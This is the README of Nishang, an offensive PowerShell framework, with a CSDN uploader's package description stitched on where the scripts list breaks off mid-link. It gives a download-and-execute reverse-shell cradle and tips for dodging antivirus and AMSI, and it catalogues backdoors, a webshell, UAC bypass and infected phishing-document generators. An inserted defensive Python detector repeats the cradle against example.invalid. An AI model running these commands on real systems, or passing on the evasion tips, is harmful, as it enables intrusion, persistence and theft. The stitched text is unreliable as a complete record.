# Nishang
### Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
By [nikhil_mitt](https://twitter.com/nikhil_mitt)
#### Usage
Import all the scripts in the current PowerShell session (PowerShell v3 onwards).
```powershell
PS C:\nishang> Import-Module .\nishang.psm1
```
Use the individual scripts with dot sourcing.
```powershell
PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1
PS C:\nishang> Get-Information
```
To get help about any script or function, use:
```powershell
PS C:\nishang> Get-Help [scriptname] -full
```
Note that since version 0.3.8 the help is available for the function loaded after running the script, not for the script file itself. In all cases, the function name is the same as the script name.
For example, to see the help about Get-WLAN-Keys.ps1, use
```powershell
PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1
PS C:\nishang> Get-Help Get-WLAN-Keys -Full
```
#### Anti Virus
Nishang scripts are flagged by many anti-virus products as malicious. The scripts on a target are meant to be used in memory, which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:
Method 1. Use the in-memory download and execute:
Use the command below to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and then call the function exported by it. All the scripts in Nishang export a function with the same name in the current PowerShell session.
```powershell
powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]
```
Method 2. Use the `-encodedcommand` (or `-e`) parameter of PowerShell.
All the scripts in Nishang export a function with the same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself when using the encodedcommand parameter from a non-PowerShell shell. For the above example, add a function call (without quotes) `"Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]"` at the end of the script.
Encode the script using Invoke-Encode from Nishang:
```powershell
PS C:\nishang> . \nishang\Utility\Invoke-Encode
PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand
Encoded data written to .\encoded.txt
Encoded command written to .\encodedcommand.txt
```
Then take the encoded command from encodedcommand.txt and run it on a target where commands can be executed (a remote shell, meterpreter native shell, a web shell etc.). Use it like below:
```powershell
C:\Users\target> powershell -e [encodedscript]
```
If the scripts still get detected, changing the function and parameter names and removing the help content will help.
In case Windows 10's AMSI is still blocking script execution, see this blog: http://www.labofapenetrationtester.com/2016/09/amsi.html
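Added example for the defender side of the `-encodedcommand` technique above; it is not part of Nishang. It pulls the base64 argument out of a recorded process command line, decodes it (base64 over UTF-16LE, which is what PowerShell's `-EncodedCommand` expects) and flags the in-memory download cradle shown in this README. The sample command lines and the `example.invalid` URL are constructed.

```python
import base64
import re

# Common spellings of powershell.exe's EncodedCommand parameter (-e, -ec, -enc,
# -EncodedCommand; other unambiguous prefixes PowerShell accepts are not covered)
# followed by one base64 token. Parameter names are case-insensitive.
ENCODED_PARAM = re.compile(
    r"(?:^|\s)-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Indicators to flag; the first three are the README's in-memory download cradle.
INDICATORS = ("Net.WebClient", "DownloadString", "iex", "Invoke-Expression",
              "Invoke-PowerShellTcp", "FromBase64String")

def extract_encoded_command(cmdline):
    """Return the base64 argument of -EncodedCommand, or None if absent."""
    m = ENCODED_PARAM.search(cmdline)
    return m.group(1) if m else None

def decode_encoded_command(b64):
    """-EncodedCommand carries base64 over the script's UTF-16LE bytes."""
    return base64.b64decode(b64).decode("utf-16-le")

def find_indicators(script):
    return [i for i in INDICATORS if i.lower() in script.lower()]

def triage(log_lines):
    # Decode each encoded PowerShell launch in the lines and attach indicators.
    findings = []
    for line in log_lines:
        b64 = extract_encoded_command(line)
        if b64 is None:
            continue
        try:
            script = decode_encoded_command(b64)
        except (ValueError, UnicodeDecodeError):  # bad padding or odd byte count
            script = "<undecodable>"
        findings.append({"line": line, "decoded": script,
                         "indicators": find_indicators(script)})
    return findings

def to_encoded_command(script):
    """Inverse of decode_encoded_command; used only to build the sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_LOG = [
    "powershell -e " + to_encoded_command(
        "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell -EncodedCommand " + to_encoded_command("Get-Date"),
]
```

Running `triage(SAMPLE_LOG)` decodes the two encoded launches and leaves the `-ExecutionPolicy` line alone, since the regex only matches the EncodedCommand spellings.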
#### Scripts
Nishang currently contains the following scripts and payloads.
#### ActiveDirectory
[Set-DCShadowPermissions](https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1)
Modify AD objects to provide minimal permissions required for DCShadow.
#### Antak - the Webshell
[Antak](https://github.com/samratashok/nishang/tree/master/Antak-WebShell)
Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.
#### Backdoors
[HTTP-Backdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/HTTP-Backdoor.ps1)
A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
[DNS_TXT_Pwnage](https://github.com/samratashok/nishang/blob/master/Backdoors/DNS_TXT_Pwnage.ps1)
A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
[Execute-OnTime](https://github.com/samratashok/nishang/blob/master/Backdoors/Execute-OnTime.ps1)
A backdoor which can execute PowerShell scripts at a given time on a target.
[Gupt-Backdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Gupt-Backdoor.ps1)
A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
[Add-ScrnSaveBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Add-ScrnSaveBackdoor.ps1)
A backdoor which can use Windows screen saver for remote command and script execution.
[Invoke-ADSBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1)
A backdoor which can use alternate data streams and Windows Registry to achieve persistence.
[Add-RegBackdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/Add-RegBackdoor.ps1)
A backdoor which uses the well-known Debugger trick to execute a payload via Sticky Keys and Utilman (Windows key + U).
[Set-RemoteWMI](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)
Modify permissions of DCOM and WMI namespaces to allow access to a non-admin user.
[Set-RemotePSRemoting](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemotePSRemoting.ps1)
Modify permissions of PowerShell remoting to allow access to a non-admin user.
#### Bypass
[Invoke-AmsiBypass](https://github.com/samratashok/nishang/blob/master/Bypass/Invoke-AmsiBypass.ps1)
Implementation of publicly known methods to bypass/avoid AMSI.
#### Client
[Out-CHM](https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1)
Create infected CHM files which can execute PowerShell commands and scripts.
[Out-Word](https://github.com/samratashok/nishang/blob/master/Client/Out-Word.ps1)
Create Word files and infect existing ones to run PowerShell commands and scripts.
[Out-Excel](https://github.com/samratashok/nishang/blob/master/Client/Out-Excel.ps1)
Create Excel files and infect existing ones to run PowerShell commands and scripts.
[Out-HTA](https://github.com/samratashok/nishang/blob/master/Client/Out-HTA.ps1)
Create an HTA file which can be deployed on a web server and used in phishing campaigns.
[Out-Java](https://github.com/samratashok/nishang/blob/master/Client/Out-Java.ps1)
Create signed JAR files which can be used with applets for script and command execution.
[Out-Shortcut](https://github.com/samratashok/nishang/blob/master/Client/Out-Shortcut.ps1)
Create shortcut files capable of executing PowerShell commands and scripts.
[Out-WebQuery](https://github.com/samratashok/nishang/blob/master/Client/Out-WebQuery.ps1)
Create IQY files for phishing credentials and SMB hashes.
[Out-JS](https://github.com/samratashok/nishang/blob/master/Client/Out-JS.ps1)
Create JS files capable of executing PowerShell commands and scripts.
[Out-SCT](https://github.com/samratashok/nishang/blob/master/Client/Out-SCT.ps1)
Create SCT files capable of executing PowerShell commands and scripts.
[Out-SCF](https://github.com/samratashok/nishang/blob/master/Client/Out-SCF.ps1)
Create an SCF file which can be used for capturing NTLM hash challenges.
#### Escalation
[Enable-DuplicateToken](https://github.com/samratashok/nishang/blob/master/Escalation/Enable-DuplicateToken.ps1)
When SYSTEM privileges are required.
[Remove-Update](https://github.com/samratashok/nishang/blob/master/Escalation/Remove-Update.ps1)
Introduce vulnerabilities by removing patches.
[Invoke-PsUACme](https://github.com/samratashok/nishang/blob/master/Escalation/Invoke-PsUACme.ps1)
Bypass UAC.
#### Execution
[Download-Execute-PS](https://github.com/samratashok/nishang/blob/master/Execution/Download-Execute-PS.ps1)
Download and execute a PowerShell script in memory.
[Download_Execute](https://github.com/samratashok/nishang/blob/master/Execution/Download_Execute.ps1)
Download an executable in text format, convert it to an executable, and execute.
[Execute-Command-MSSQL](https
#### Uploader's notes (CSDN package)
Nishang 2022, latest usable version (stable). 100 files: 87 ps1, 3 md, 2 psm1. Uploaded 2022-06-28 19:56:42, 2.31MB ZIP.
Nishang is a PowerShell attack framework, a collection of PowerShell attack scripts and payloads; Nishang is widely used in every phase of penetration testing.
Nishang directory overview:
ActiveDirectory: Active Directory
Antak-Webshell: execute PowerShell scripts in memory, run commands, and download and upload files using this webshell
Backdoors: a backdoor that can receive instructions from third-party websites and execute PowerShell scripts in memory
Bypass: implementation of publicly known bypass methods
Client: client-side
Escalation: privilege escalation when higher privileges are required
Execution: command execution (RCE)
Gather: information gathering
MITM: local HTTPS proxy for MITM attacks
Misc: miscellaneous scripts
Pivot: pivoting
Prasadhak: check the hashes of running processes against the VirusTotal database